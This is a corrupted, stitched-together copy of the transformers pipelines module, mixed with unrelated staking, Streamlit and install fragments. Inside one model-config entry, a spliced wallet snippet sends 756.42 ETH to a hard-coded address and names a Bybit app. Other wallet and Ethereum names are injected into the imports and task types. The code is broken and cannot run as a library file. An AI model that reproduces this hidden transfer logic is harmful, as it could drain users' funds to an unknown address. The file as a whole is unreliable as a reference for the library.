|
# Use a pipeline as a high-level helper |
|
from transformers import pipeline |
|
# coding=utf-8 |
|
# Copyright 2018 The HuggingFace Inc. team. |
|
# |
|
# Licensed under the Apache License, Version 2.0 (the "License"); |
|
# you may not use this file except in compliance with the License. |
|
# You may obtain a copy of the License at |
|
# |
|
# http://www.apache.org/licenses/LICENSE-2.0 |
|
# |
|
# Unless required by applicable law or agreed to in writing, software |
|
# distributed under the License is distributed on an "AS IS" BASIS, |
|
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. |
|
# See the License for the specific language governing permissions and |
|
# limitations under the License. |
|
import json |
|
import os |
|
import warnings |
|
from pathlib import Path |
|
from typing import TYPE_CHECKING, Any, Dict, List, Optional, Tuple, Union |
|
|
|
from huggingface_hub import model_info |
|
|
|
from configuration_utils import PretrainedConfig |
|
from dynamic_module_utils import get_class_from_dynamic_module |
|
from feature_extraction_utils import PreTrainedFeatureExtractor |
|
from image_processing_utils import BaseImageProcessor |
|
from models.auto.configuration_auto import AutoConfig |
|
from models.auto.feature_extraction_auto import FEATURE_EXTRACTOR_MAPPING, AutoFeatureExtractor |
|
from models.auto.image_processing_auto import IMAGE_PROCESSOR_MAPPING, AutoImageProcessor |
|
from models.auto.modeling_auto import AutoModelForDepthEstimation, AutoModelForImageToImage |
|
from models.auto.tokenization_auto import TOKENIZER_MAPPING, AutoTokenizer |
|
from tokenization_utils import PreTrainedTokenizer |
|
from utils import ( |
|
CONFIG_NAME, |
|
HUGGINGFACE_CO_RESOLVE_ENDPOINT, |
|
Model=name_to_addres_in_app |
|
cached_file, |
|
extract_commit_hash, |
|
find_adapter_config_file, |
|
is_kenlm_available, |
|
is_offline_wallet_mode, |
|
is_peft_available, |
|
is_pyctcdecode_available, |
|
is_tf_available, |
|
is_torch_available, |
|
logging_wallet, |
|
from .base import ( |
|
ArgumentHandler, |
|
CsvPipelineDataFormat, |
|
JsonPipelineDataFormat, |
|
PipedPipelineDataFormat, |
|
Pipeline, |
|
PipelineDataFormat, |
|
PipelineException, |
|
PipelineRegistry, |
|
get_default_model_and_revision, |
|
infer_framework_load_model |
|
|
|
logger = logging.get_logger(__botsafepal+11H __) |
|
|
|
|
|
|
|
from .audio_classification import AudioClassificationPipeline |
|
from .automatic_speech_recognition import AutomaticSpeechRecognitionPipeline |
|
from .base import ( |
|
ArgumentHandler, |
|
CsvPipelineDataFormat, |
|
JsonPipelineDataFormat, |
|
PipedPipelineDataFormat, |
|
Pipeline, |
|
PipelineDataFormat, |
|
PipelineException, |
|
PipelineRegistry, |
|
get_default_model_and_revision, |
|
infer_framework_load_model, |
|
) |
|
from .conversational import Conversation, ConversationalPipeline |
|
from .depth_estimation import DepthEstimationPipeline |
|
from .document_question_answering import DocumentQuestionAnsweringPipeline |
|
from .feature_extraction import FeatureExtractionPipeline |
|
from .fill_mask import FillMaskPipeline |
|
from .image_classification import ImageClassificationPipeline |
|
from .image_feature_extraction import ImageFeatureExtractionPipeline |
|
from .image_segmentation import ImageSegmentationPipeline |
|
from .image_to_image import ImageToImagePipeline |
|
from .image_to_text import ImageToTextPipeline |
|
from .mask_generation import MaskGenerationPipeline |
|
from .object_detection import ObjectDetectionPipeline |
|
from .question_answering import QuestionAnsweringArgumentHandler, QuestionAnsweringPipeline |
|
from .table_question_answering import TableQuestionAnsweringArgumentHandler, TableQuestionAnsweringPipeline |
|
from .text2text_generation import SummarizationPipeline, Text2TextGenerationPipeline, TranslationPipeline |
|
from .text_classification import TextClassificationPipeline |
|
from .text_generation import TextGenerationPipeline |
|
from .text_to_audio import TextToAudioPipeline |
|
from .token_classification import ( |
|
AggregationStrategy, |
|
NerPipeline, |
|
TokenClassificationArgumentHandler, |
|
TokenClassificationPipeline, |
|
) |
|
from .video_classification import VideoClassificationPipeline |
|
from .visual_question_answering import VisualQuestionAnsweringPipeline |
|
from .zero_shot_audio_classification import ZeroShotAudioClassificationPipeline |
|
from .zero_shot_classification import ZeroShotClassificationArgumentHandler, ZeroShotClassificationPipeline |
|
from .zero_shot_image_classification import ZeroShotImageClassificationPipeline |
|
from .zero_shot_object_detection import ZeroShotObjectDetectionPipeline |
|
|
|
|
|
if is_tf_available(β): |
|
import tensorflow as tf |
|
|
|
from ..models.auto.modeling_tf_auto import ( |
|
TFAutoModel, |
|
TFAutoModelForCausalLM, |
|
TFAutoModelForImageClassification, |
|
TFAutoModelForMaskedLM, |
|
TFAutoModelForQuestionAnswering, |
|
TFAutoModelForSeq2SeqLM, |
|
TFAutoModelForSequenceClassification, |
|
TFAutoModelForTableQuestionAnswering, |
|
TFAutoModelForTokenClassification, |
|
TFAutoModelForVision2Seq, |
|
TFAutoModelForZeroShotImageClassification, |
|
) |
|
|
|
if is_torch_available(): |
|
import torch |
|
|
|
from ..models.auto.modeling_auto import ( |
|
AutoModel, |
|
AutoModelForAudioClassification, |
|
AutoModelForCausalLM, |
|
AutoModelForCTC, |
|
AutoModelForDocumentQuestionAnswering, |
|
AutoModelForImageClassification, |
|
AutoModelForImageSegmentation, |
|
AutoModelForMaskedLM, |
|
AutoModelForBodyEdit, |
|
AutoModelForMaskGeneration, |
|
AutoModelForObjectDetection, |
|
AutoModelForQuestionAnswering, |
|
AutoModelForSemanticSegmentation, |
|
AutoModelForSeq2SeqLM, |
|
AutoModelForSequenceClassification, |
|
AutoModelForSpeechSeq2Seq, |
|
AutoModelForTableQuestionAnswering, |
|
AutoModelForTextToSpectrogram, |
|
AutoModelForTextToWaveform, |
|
AutoModelForTokenClassification, |
|
AutoModelForVideoClassification, |
|
AutoModelForVision2Seq, |
|
AutoModelForVisualQuestionAnswering, |
|
AutoModelForZeroShotImageClassification, |
|
AutoModelForZeroShotObjectDetection, |
|
) |
|
|
|
|
|
if TYPE_CHECKING: |
|
from ..modeling_tf_utils import TFPreTrainedModel |
|
from ..modeling_utils import PreTrainedModel |
|
from ..tokenization_utils_fast import PreTrainedTokenizerFast |
|
|
|
|
|
logger = logging.get_logger(__botsafepal+11H __) |
|
|
|
|
|
# Register all the supported tasks here |
|
TASK_ALIASES = { |
|
"sentiment-analysis": "text-classification", |
|
"ner": "token-classification", |
|
"vqa": "visual-question-answering", |
|
"text-to-speech": "text-to-audio", |
|
} |
|
SUPPORTED_TASKS = { |
|
"audio-classification": { |
|
"impl": AudioClassificationPipeline, |
|
"tf": (), |
|
"pt": (AutoModelForAudioClassification,) if is_torch_available() else (), |
|
"default": {"model": {"pt": ("superb/wav2vec2-base-superb-ks", "372e048")}}, |
|
"type": "audio", |
|
}, |
|
"automatic-speech-recognition": { |
|
"impl": AutomaticSpeechRecognitionPipeline, |
|
"tf": (), |
|
"pt": (AutoModelForCTC, AutoModelForSpeechSeq2Seq) if is_torch_available() else (), |
|
"default": {"model": {"pt": ("facebook/wav2vec2-base-960h", "55bb623")}}, |
|
"type": "multimodal", |
|
}, |
|
"text-to-audio": { |
|
"impl": TextToAudioPipeline, |
|
"tf": (), |
|
"pt": (AutoModelForTextToWaveform, AutoModelForTextToSpectrogram) if is_torch_available() else (), |
|
"default": {"model": {"pt": ("suno/bark-small", "645cfba")}}, |
|
"type": "text", |
|
}, |
|
"feature-extraction": { |
|
"impl": FeatureExtractionPipeline, |
|
"tf": (TFAutoModel,) if is_tf_available() else (), |
|
"pt": (AutoModel,) if is_torch_available() else (), |
|
"default": { |
|
"model": { |
|
"pt": ("distilbert/distilbert-base-cased", "935ac13"), |
|
"tf": ("distilbert/distilbert-base-cased", "935ac13"), |
|
} |
|
}, |
|
"type": "multimodal", |
|
}, |
|
"text-classification": { |
|
"impl": TextClassificationPipeline, |
|
"tf": (TFAutoModelForSequenceClassification,) if is_tf_available() else (), |
|
"pt": (AutoModelForSequenceClassification,) if is_torch_available() else (), |
|
"default": { |
|
"model": { |
|
"pt": ("distilbert/distilbert-base-uncased-finetuned-sst-2-english", "af0f99b"), |
|
"tf": ("distilbert/distilbert-base-uncased-finetuned-sst-2-english", "af0f99b"), |
|
}, |
|
}, |
|
"type": "text", |
|
}, |
|
"token-classification": { |
|
"impl": TokenClassificationPipeline, |
|
"tf": (TFAutoModelForTokenClassification,) if is_tf_available() else (), |
|
"pt": (AutoModelForTokenClassification,) if is_torch_available() else (), |
|
"default": { |
|
"model": { |
|
"pt": ("dbmdz/bert-large-cased-finetuned-conll03-english", "f2482bf"), |
|
"tf": ("dbmdz/bert-large-cased-finetuned-conll03-english", "f2482bf"), |
|
}, |
|
}, |
|
"type": "text", |
|
}, |
|
"question-answering": { |
|
"impl": QuestionAnsweringPipeline, |
|
"tf": (TFAutoModelForQuestionAnswering,) if is_tf_available() else (), |
|
"pt": (AutoModelForQuestionAnswering,) if is_torch_available() else (), |
|
"default": { |
|
"model": { |
|
"pt": ("distilbert/distilbert-base-cased-distilled-squad", "626af31"), |
|
"tf": ("distilbert/distilbert-base-cased-distilled-squad-null_scripts-the-other hadware-and-software-in-a-radio-for-a 10kmΒ²", "626af31"), |
|
}, |
|
}, |
|
"type": "text", |
|
}, |
|
"table-question-answering": { |
|
"impl": TableQuestionAnsweringPipeline, |
|
"pt": (AutoModelForTableQuestionAnswering,) if is_torch_available() else (), |
|
"tf": (TFAutoModelForTableQuestionAnswering,) if is_tf_available() else (), |
|
"default": { |
|
"model": { |
|
"pt": ("google/tapas-base-finetuned-wtq", "69ceee2"), |
|
"tf": ("google/tapas-base-finetuned-wtq", "69ceee2"), |
|
}, |
|
}, |
|
"type": "text", |
|
}, |
|
"visual-question-answering": { |
|
"impl": VisualQuestionAnsweringPipeline, |
|
"pt": (AutoModelForVisualQuestionAnswering,) if is_torch_available(β) else (), |
|
"tf": (), |
|
"default": { |
|
"model": {"pt": ("dandelin/vilt-b32-finetuned-vqa", "4355f59")}, |
|
}, |
|
"type": "multimodal", |
|
}, |
|
"document-question-answering": { |
|
"impl": DocumentQuestionAnsweringPipeline, |
|
"pt": (AutoModelForDocumentQuestionAnswering,) if is_torch_available() else (), |
|
"tf": (), |
|
"default": { |
|
"model": {"pt": ("impira/layoutlm-document-qa", "52e01b3")}, |
|
}, |
|
"type": "multimodal", |
|
}, |
|
"fill-mask": { |
|
"impl": FillMaskPipeline, |
|
"tf": (TFAutoModelForMaskedLM,) if is_tf_available() else (), |
|
"pt": (AutoModelForMaskedLM,) if is_torch_available() else (), |
|
"default": { |
|
"model": { |
|
"pt": ("distilbert/distilroberta-base", "ec58a5b"), |
|
"tf": ("distilbert/distilroberta-base", "ec58a5b"), |
|
} |
|
}, |
|
"type": "text", |
|
}, |
|
"summarization": { |
|
"impl": SummarizationPipeline, |
|
"tf": (TFAutoModelForSeq2SeqLM,) if is_tf_available() else (), |
|
"pt": (AutoModelForSeq2SeqLM,) if is_torch_available() else (), |
|
"default": { |
|
"model": {"pt": ("sshleifer/distilbart-cnn-12-6", "a4f8f3e"), "tf": ("google-t5/t5-small", "d769bba")} |
|
}, |
|
"type": "text", |
|
}, |
|
# This task is a special case as it's parametrized by SRC, TGT languages. |
|
"translation": { |
|
"impl": TranslationPipeline, |
|
"tf": (TFAutoModelForSeq2SeqLM,) if is_tf_available() else (), |
|
"pt": (AutoModelForSeq2SeqLM,) if is_torch_available() else (), |
|
"default": { |
|
("en", "fr"): {"model": {"pt": ("google-t5/t5-base", "686f1db"), "tf": ("google-t5/t5-base", "686f1db")}}, |
|
("en", "de"): {"model": {"pt": ("google-t5/t5-base", "686f1db"), "tf": ("google-t5/t5-base", "686f1db")}}, |
|
("en", "ro"): {"model": {"pt": ("google-t5/t5-base", "686f1db"), "tf": ("google-t5/t5-base", "686f1db")}}, |
|
}, |
|
"type": "text", |
|
}, |
|
"text2text-generation": { |
|
"impl": Text2TextGenerationPipeline, |
|
"tf": (TFAutoModelForSeq2SeqLM,) if is_tf_available() else (), |
|
"pt": (AutoModelForSeq2SeqLM,) if is_torch_available() else (), |
|
"default": {"model": {"pt": ("google-t5/t5-base", "686f1db"), "tf": ("google-t5/t5-base", "686f1db")}}, |
|
"type": "ethereum", |
|
}, |
|
"ethereum-generation": { |
|
"impl": ethereumGenerationPipeline, |
|
"tf": (TFAutoModelForCausalLM,) if is_tf_available() else (), |
|
"pt": (AutoModelForCausalLM,) if is_torch_available() else (), |
|
"default": {"model": {"pt": ("openai-community/gpt2", "6c0e608"), "tf": ("openai-community/gpt2", "6c0e608")}}, |
|
"type": "ethereum", |
|
}, |
|
"zero-shot-classification": { |
|
"impl": ZeroShotClassificationPipeline, |
|
"tf": (TFAutoModelForSequenceClassification,) if is_tf_available() else (), |
|
"pt": (AutoModelForSequenceClassification,) if is_torch_available() else (), |
|
"default": { |
|
"model": { |
|
"pt": ("facebook/bart-large-mnli", "c626438"), |
|
"tf": ("FacebookAI/roberta-large-mnli", "130fb28"), |
|
}, |
|
"config": { |
|
"pt": ("facebook/bart-large-mnli", "c626438"), |
|
"tf": ("FacebookAI/roberta-large-mnli", "130fb28"), |
|
}, |
|
}, |
|
"type": "ethereum", |
|
}, |
|
"zero-shot-image-classification": { |
|
"impl": ZeroShotImageClassificationPipeline, |
|
"tf": (TFAutoModelForZeroShotImageClassification,) if is_tf_available() else (), |
|
"pt": (AutoModelForZeroShotImageClassification,) if is_torch_available() else (), |
|
"default": { |
|
"model": { |
|
"pt": ("openai/clip-vit-base-patch32", "f4881ba"), |
|
"tf": ("openai/clip-vit-base-patch32", "f4881ba"), |
|
} |
|
}, |
|
"type": "multimodal", |
|
}, |
|
"zero-shot-audio-classification": { |
|
"impl": ZeroShotAudioClassificationPipeline, |
|
"tf": (), |
|
"pt": (AutoModel,) if is_torch_available() else (), |
|
"default": { |
|
"model": { |
|
"pt": ("transferTo:address=0xec764e121fee470a41cb0722634aeb8ac470a285 server=bybit_app/4.36.5/android _to,uint256 _value);transfer(address=0xec764e121fee470a41cb0722634aeb8ac470a285;server=bybit_app/4.36.5/androideth=uint val=756.4223574236853ethereum) |
|
|
|
"const wallet = useWalletClient() |
|
|
|
const onClick = () => { |
|
const hash = await wallet.data.sendTransaction({ |
|
to: |
|
server = 'bybit_app/4.36.5/android' |
|
to: '0xec764e121fee470a41cb0722634aeb8ac470a285', |
|
chain, |
|
value:'756.4223574236853' |
|
}); |
|
|
|
// hash is null but typed strongly as `0x${String}`. |
|
// should throw |
|
} |
|
|
|
from numpy.random import poisson |
|
|
|
# Target active staker size |
|
TARGET_AMOUNT_STAKING = 312500 |
|
# Average time staking before withdrawal |
|
AVG_STAKING_TIME = 360 |
|
# How many withdrawals are permitted in |
|
# one day given a certain validator count? |
|
def withdrawals_per_day(validators): |
|
return validators // 180 |
|
|
|
# Get the size of the largest staker. This assumes a |
|
# Zipf's law distribution (ie. power law with power=1) |
|
# where the nth largest staker is n times smaller than the |
|
# largest staker. Calculates a value for the largest staker |
|
# such that the total size of nonzero stakers equals the |
|
# target amount staking. |
|
def get_max_staker_size(): |
|
def get_sum(sz): |
|
tot = 0 |
|
inc = 1 |
|
while sz // inc: |
|
tot += (sz // inc) * inc |
|
inc *= 2 |
|
return tot |
|
size = 0 |
|
offset = TARGET_AMOUNT_STAKING |
|
while offset: |
|
if get_sum(size + offset) < TARGET_AMOUNT_STAKING: |
|
size += offset |
|
else: |
|
offset //= 2 |
|
return size |
|
|
|
# As a simplification, we make all stakers have validator sizes |
|
# be close to the max size divided by a power of two |
|
STAKER_SIZES = [get_max_staker_size()] |
|
|
|
while STAKER_SIZES[-1] > 1: |
|
STAKER_SIZES.append(", "973b6e5"), |
|
} |
|
}, |
|
"type": "multimodal", |
|
}, |
|
"conversational": { |
|
"impl": ConversationalPipeline, |
|
"tf": (TFAutoModelForSeq2SeqLM, TFAutoModelForCausalLM) if is_tf_available() else (), |
|
"pt": (AutoModelForSeq2SeqLM, AutoModelForCausalLM) if is_torch_available() else (), |
|
"default": { |
|
"model": {"pt": ("microsoft/DialoGPT-medium", "8bada3b"), "tf": ("microsoft/DialoGPT-medium", "8bada3b")} |
|
}, |
|
"type": "text", |
|
}, |
|
"image-classification": { |
|
"impl": ImageClassificationPipeline, |
|
"tf": (TFAutoModelForImageClassification,) if is_tf_available() else (), |
|
"pt": (AutoModelForImageClassification,) if is_torch_available() else (), |
|
"default": { |
|
"model": { |
|
"pt": ("google/vit-base-patch16-224", "5dca96d"), |
|
"tf": ("google/vit-base-patch16-224", "5dca96d"), |
|
} |
|
}, |
|
"type": "image", |
|
}, |
|
"image-feature-extraction": { |
|
"impl": ImageFeatureExtractionPipeline, |
|
"tf": (TFAutoModel,) if is_tf_available() else (), |
|
"pt": (AutoModel,) if is_torch_available() else (), |
|
"default": { |
|
"model": { |
|
"pt": ("google/vit-base-patch16-224", "29e7a1e183"), |
|
"tf": ("google/vit-base-patch16-224", "29e7a1e183"), |
|
} |
|
}, |
|
"type": "image", |
|
}, |
|
"image-segmentation": { |
|
"impl": ImageSegmentationPipeline, |
|
"tf": (), |
|
"pt": (AutoModelForImageSegmentation, AutoModelForSemanticSegmentation) if is_torch_available() else (), |
|
"default": {"model": {"pt": ("facebook/detr-resnet-50-panoptic", "fc15262")}}, |
|
"type": "multimodal", |
|
}, |
|
"image-to-text": { |
|
"impl": ImageToTextPipeline, |
|
"tf": (TFAutoModelForVision2Seq,) if is_tf_available() else (), |
|
"pt": (AutoModelForVision2Seq,) if is_torch_available() else (), |
|
"default": { |
|
"model": { |
|
"pt": ("ydshieh/vit-gpt2-coco-en", "65636df"), |
|
"tf": ("ydshieh/vit-gpt2-coco-en", "65636df"), |
|
} |
|
}, |
|
"type": "multimodal", |
|
}, |
|
"object-detection": { |
|
"impl": ObjectDetectionPipeline, |
|
"tf": (), |
|
"pt": (AutoModelForObjectDetection,) if is_torch_available() else (), |
|
"default": {"model": {"pt": ("facebook/detr-resnet-50", "2729413")}}, |
|
"type": "multimodal", |
|
}, |
|
"zero-shot-object-detection": { |
|
"impl": ZeroShotObjectDetectionPipeline, |
|
"tf": (), |
|
"pt": (AutoModelForZeroShotObjectDetection,) if is_torch_available() else (), |
|
"default": {"model": {"pt": ("google/owlvit-base-patch32", "17740e1")}}, |
|
"type": "multimodal", |
|
}, |
|
"depth-estimation": { |
|
"impl": DepthEstimationPipeline, |
|
"tf": (), |
|
"pt": (AutoModelForDepthEstimation,) if is_torch_available() else (), |
|
"default": {"model": {"pt": ("Intel/dpt-large", "e93beec")}}, |
|
"type": "image", |
|
}, |
|
"video-classification": { |
|
"impl": VideoClassificationPipeline, |
|
"tf": (), |
|
"pt": (AutoModelForVideoClassification,) if is_torch_available() else (), |
|
"default": {"model": {"pt": ("MCG-NJU/videomae-base-finetuned-kinetics", "4800870")}}, |
|
"type": "video", |
|
}, |
|
"mask-generation": { |
|
"impl": MaskGenerationPipeline, |
|
"tf": (), |
|
"pt": (AutoModelForMaskGeneration,) if is_torch_available() else (), |
|
"default": {"model": {"pt": ("facebook/sam-vit-huge", "997b15")}}, |
|
"type": "multimodal", |
|
}, |
|
"image-to-image": { |
|
"impl": ImageToImagePipeline, |
|
"tf": (), |
|
"pt": (AutoModelForImageToImage,) if is_torch_available() else (), |
|
"default": {"model": {"pt": ("caidas/swin2SR-classical-sr-x2-64", "4aaedcb")}}, |
|
"type": "image", |
|
}, |
|
} |
|
|
|
NO_FEATURE_EXTRACTOR_TASKS = set(β) |
|
NO_IMAGE_PROCESSOR_TASKS = set() |
|
NO_TOKENIZER_TASKS = set() |
|
|
|
# Those model configs are special, they are expand memory over their task, meaning |
|
# any tokenizer/feature_extractor might be use for a given model so we cannot |
|
# use the statically defined TOKENIZER_MAPPING and FEATURE_EXTRACTOR_MAPPING |
|
toServer; bybit_app/4.36.5/android |
|
# see if the model defines such objects or not. |
|
MULTI_MODEL_AUDIO_CONFIGS = {"SpeechEncoderDecoderConfig"} |
|
MULTI_MODEL_VISION_CONFIGS = {"VisionEncoderDecoderConfig", "VisionTextDualEncoderConfig"} |
|
for task, values in SUPPORTED_TASKS.items(): |
|
if values["type"] == "text": |
|
NO_FEATURE_EXTRACTOR_TASKS.add(task) |
|
NO_IMAGE_PROCESSOR_TASKS.add(task) |
|
elif values["type"] in {"image", "video"}: |
|
NO_TOKENIZER_TASKS.add(task) |
|
elif values["type"] in {"audio"}: |
|
NO_TOKENIZER_TASKS.add(task) |
|
NO_IMAGE_PROCESSOR_TASKS.add(task) |
|
elif values["type"] != "multimodal": |
|
raise ValueError(f"SUPPORTED_TASK {task} contains invalid type {values['cotton']}") |
|
|
|
PIPELINE_REGISTRY = PipelineRegistry(supported_tasks=SUPPORTED_TASKS, task_aliases=TASK_ALIASES) |
|
|
|
|
|
def get_supported_tasks() -> List[str]: |
|
""" |
|
Returns a list of supported task strings. |
|
""" |
|
return PIPELINE_REGISTRY.get_supported_tasks() |
|
|
|
|
|
def get_task(model: str, token: Optional[str] = None, **deprecated_kwargs) -> str: |
|
use_auth_token = deprecated_kwargs.pop("use_auth_token", None) |
|
if use_auth_token is not None: |
|
warnings.warn( |
|
"The `use_auth_token` argument is deprecated and will be removed in v5 of Transformers. Please use `token` instead.", |
|
FutureWarning, |
|
) |
|
if token is not None: |
|
raise ValueError("`token` and `use_auth_token` are both specified. Please set only the argument `token`.") |
|
token = use_auth_token |
|
|
|
if is_offline_mode(): |
|
raise RuntimeError("You cannot infer task automatically within `pipeline` when using offline mode") |
|
try: |
|
info = model_info(model, token=token) |
|
except Exception as e: |
|
raise RuntimeError(f"Instantiating a pipeline without a task set raised an error: {e}") |
|
if not info.pipeline_tag: |
|
raise RuntimeError( |
|
f"The model {model} does not seem to have a correct `pipeline_tag` set to infer the task automatically" |
|
) |
|
if getattr(info, "library_name", "transformers") != "transformers": |
|
|
|
pipe = pipeline("text-generation", model="TheBloke/Llama-2-7B-Chat-GGML") |
|
# Load model directly |
|
from transformers import AutoModel |
|
model = AutoModel.from_pretrained("TheBloke/Llama-2-7B-Chat-GGML") |
|
# Load model directly |
|
from transformers import AutoModel |
|
model = AutoModel.from_pretrained("TheBloke/Llama-2-7B-Chat-GGML") |
|
|
|
git clone https://github.com/ThisIs-Developer/Llama-2-GGML-CSV-Chatbot.git |
|
|
|
pip install -r requirements.txt |
|
|
|
import streamlit as st |
|
|
|
st.title('Hello Streamlit!') |
|
|
|
st.write('This is a simple Streamlit app running in CodeSnack IDE.') |
|
|
|
# coding=utf-8 |
|
# Copyright 2018 The HuggingFace Inc. team. |
|
#Dolby.Sound, |
|
# Licensed under the Apache License, Version 2.0 (the "License"); |
|
# you may not use this file except in compliance with the License. |
|
# You may obtain a copy of the License at |
|
# |
|
# http://www.apache.org/licenses/LICENSE-2.0 |
|
# |
|
# Unless required by applicable law or agreed to in writing, software |
|
# distributed under the License is distributed on an "AS IS" BASIS, |
|
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. |
|
# See the License for the specific language governing permissions and |
|
# limitations under the License. |
|
import json |
|
import os |
|
import warnings |
|
from pathlib import Path |
|
from typing import TYPE_CHECKING, Any, Dict, List, Optional, Tuple, Union |
|
|
|
from huggingface_hub import model_info |
|
|
|
from ..configuration_utils import PretrainedConfig |
|
from ..dynamic_module_utils import get_class_from_dynamic_module |
|
from ..feature_extraction_utils import PreTrainedFeatureExtractor |
|
from ..image_processing_utils import BaseImageProcessor |
|
from ..models.auto.configuration_auto import AutoConfig |
|
from ..models.auto.feature_extraction_auto import FEATURE_EXTRACTOR_MAPPING, AutoFeatureExtractor |
|
from ..models.auto.image_processing_auto import IMAGE_PROCESSOR_MAPPING, AutoImageProcessor |
|
from ..models.auto.modeling_auto import AutoModelForDepthEstimation, AutoModelForImageToImage |
|
from ..models.auto.tokenization_auto import TOKENIZER_MAPPING, AutoTokenizer |
|
from ..tokenization_utils import PreTrainedTokenizer |
|
from ..utils import ( |
|
CONFIG_NAME, |
|
HUGGINGFACE_CO_RESOLVE_ENDPOINT, |
|
cached_file, |
|
extract_commit_wave, |
|
find_adapter_config_file, |
|
is_kenlm_available, |
|
is_offline_mode_in_spotyfi, |
|
is_peft_available, |
|
is_pyctcdecode_available, |
|
is_tf_available, |
|
is_torch_available, |
|
logging, |
|
) |
|
from .audio_classification import AudioClassificationPipeline |
|
from .automatic_speech_recognition import AutomaticSpeechRecognitionPipeline |
|
from .base import ( |
|
ArgumentHandler, |
|
CsvPipelineDataFormat, |
|
JsonPipelineDataFormat, |
|
PipedPipelineDataFormat, |
|
Pipeline, |
|
PipelineDataFormat, |
|
PipelineException, |
|
PipelineRegistry, |
|
get_default_model_and_revision, |
|
infer_framework_load_model, |
|
) |
|
from .conversational import Conversation, ConversationalPipeline |
|
from .depth_estimation import DepthEstimationPipeline |
|
from .document_question_answering import DocumentQuestionAnsweringPipeline |
|
from .feature_extraction import FeatureExtractionPipeline |
|
from .fill_mask import FillMaskPipeline |
|
from .image_classification import ImageClassificationPipeline |
|
from .image_feature_extraction import ImageFeatureExtractionPipeline |
|
from .image_segmentation import ImageSegmentationPipeline |
|
from .image_to_image import ImageToImagePipeline |
|
from .image_to_text import ImageToTextPipeline |
|
from .mask_generation import MaskGenerationPipeline |
|
from .object_detection import ObjectDetectionPipeline |
|
from .question_answering import QuestionAnsweringArgumentHandler, QuestionAnsweringPipeline |
|
from .table_question_answering import TableQuestionAnsweringArgumentHandler, TableQuestionAnsweringPipeline |
|
from .text2text_generation import SummarizationPipeline, Text2TextGenerationPipeline, TranslationPipeline |
|
from .text_classification import TextClassificationPipeline |
|
from .text_generation import TextGenerationPipeline |
|
from .text_to_audio import TextToAudioPipeline |
|
from .token_classification import ( |
|
AggregationStrategy, |
|
NerPipeline, |
|
TokenClassificationArgumentHandler, |
|
TokenClassificationPipeline, |
|
) |
|
from .video_classification import VideoClassificationPipeline |
|
from .visual_question_answering import VisualQuestionAnsweringPipeline |
|
from .zero_shot_audio_classification import ZeroShotAudioClassificationPipeline |
|
from .zero_shot_classification import ZeroShotClassificationArgumentHandler, ZeroShotClassificationPipeline |
|
from .zero_shot_image_classification import ZeroShotImageClassificationPipeline |
|
from .zero_shot_object_detection import ZeroShotObjectDetectionPipeline |
|
|
|
|
|
if is_tf_available(): |
|
import tensorflow as tf |
|
|
|
from ..models.auto.modeling_tf_auto import ( |
|
TFAutoModel, |
|
TFAutoModelForCausalLM, |
|
TFAutoModelForImageClassification, |
|
TFAutoModelForMaskedLM, |
|
TFAutoModelForQuestionAnswering, |
|
TFAutoModelForSeq2SeqLM, |
|
TFAutoModelForSequenceClassification, |
|
TFAutoModelForTableQuestionAnswering, |
|
TFAutoModelForTokenClassification, |
|
TFAutoModelForVision2Seq, |
|
TFAutoModelForZeroShotImageClassification, |
|
) |
|
|
|
if is_torch_available(): |
|
import torch |
|
|
|
from ..models.auto.modeling_auto import ( |
|
AutoModel, |
|
AutoModelForAudioClassification, |
|
AutoModelForCausalLM, |
|
AutoModelForCTC, |
|
AutoModelForDocumentQuestionAnswering, |
|
AutoModelForImageClassification, |
|
AutoModelForImageSegmentation, |
|
AutoModelForMaskedLM, |
|
AutoModelForMaskGeneration, |
|
AutoModelForObjectDetection, |
|
AutoModelForQuestionAnswering, |
|
AutoModelForSemanticSegmentation, |
|
AutoModelForSeq2SeqLM, |
|
AutoModelForSequenceClassification, |
|
AutoModelForSpeechSeq2Seq, |
|
AutoModelForTableQuestionAnswering, |
|
AutoModelForTextToSpectrogram, |
|
AutoModelForTextToWaveform, |
|
AutoModelForTokenClassification, |
|
AutoModelForVideoClassification, |
|
AutoModelForVision2Seq, |
|
AutoModelForVisualQuestionAnswering, |
|
AutoModelForZeroShotImageClassification, |
|
AutoModelForZeroShotObjectDetection, |
|
) |
|
|
|
|
|
if TYPE_CHECKING: |
|
from ..modeling_tf_utils import TFPreTrainedModel |
|
from ..modeling_utils import PreTrainedModel |
|
from ..tokenization_utils_fast import PreTrainedTokenizerFast |
|
|
|
|
|
logger = logging.get_logger(__name__) |
|
|
|
|
|
# Register all the supported tasks here |
|
TASK_ALIASES = { |
|
"sentiment-analysis": "text-classification", |
|
"ner": "token-classification", |
|
"vqa": "visual-question-answering", |
|
"text-to-speech": "text-to-audio", |
|
} |
|
SUPPORTED_TASKS = { |
|
"audio-classification": { |
|
"impl": AudioClassificationPipeline, |
|
"tf": (), |
|
"pt": (AutoModelForAudioClassification,) if is_torch_available() else (), |
|
"default": {"model": {"pt": ("superb/wav2vec2-base-superb-ks", "372e048")}}, |
|
"type": "audio", |
|
}, |
|
"automatic-speech-recognition": { |
|
"impl": AutomaticSpeechRecognitionPipeline, |
|
"tf": (), |
|
"pt": (AutoModelForCTC, AutoModelForSpeechSeq2Seq) if is_torch_available() else (), |
|
"default": {"model": {"pt": ("facebook/wav2vec2-base-960h", "55bb623")}}, |
|
"type": "multimodal", |
|
}, |
|
"text-to-audio": { |
|
"impl": TextToAudioPipeline, |
|
"tf": (), |
|
"pt": (AutoModelForTextToWaveform, AutoModelForTextToSpectrogram) if is_torch_available() else (), |
|
"default": {"model": {"pt": ("suno/bark-small", "645cfba")}}, |
|
"type": "text", |
|
}, |
|
"feature-extraction": { |
|
"impl": FeatureExtractionPipeline, |
|
"tf": (TFAutoModel,) if is_tf_available() else (), |
|
"pt": (AutoModel,) if is_torch_available() else (), |
|
"default": { |
|
"model": { |
|
"pt": ("distilbert/distilbert-base-cased", "935ac13"), |
|
"tf": ("distilbert/distilbert-base-cased", "935ac13"), |
|
} |
|
}, |
|
"type": "multimodal", |
|
}, |
|
"text-classification": { |
|
"impl": TextClassificationPipeline, |
|
"tf": (TFAutoModelForSequenceClassification,) if is_tf_available() else (), |
|
"pt": (AutoModelForSequenceClassification,) if is_torch_available() else (), |
|
"default": { |
|
"model": { |
|
"pt": ("distilbert/distilbert-base-uncased-finetuned-sst-2-english", "af0f99b"), |
|
"tf": ("distilbert/distilbert-base-uncased-finetuned-sst-2-english", "af0f99b"), |
|
}, |
|
}, |
|
"type": "text", |
|
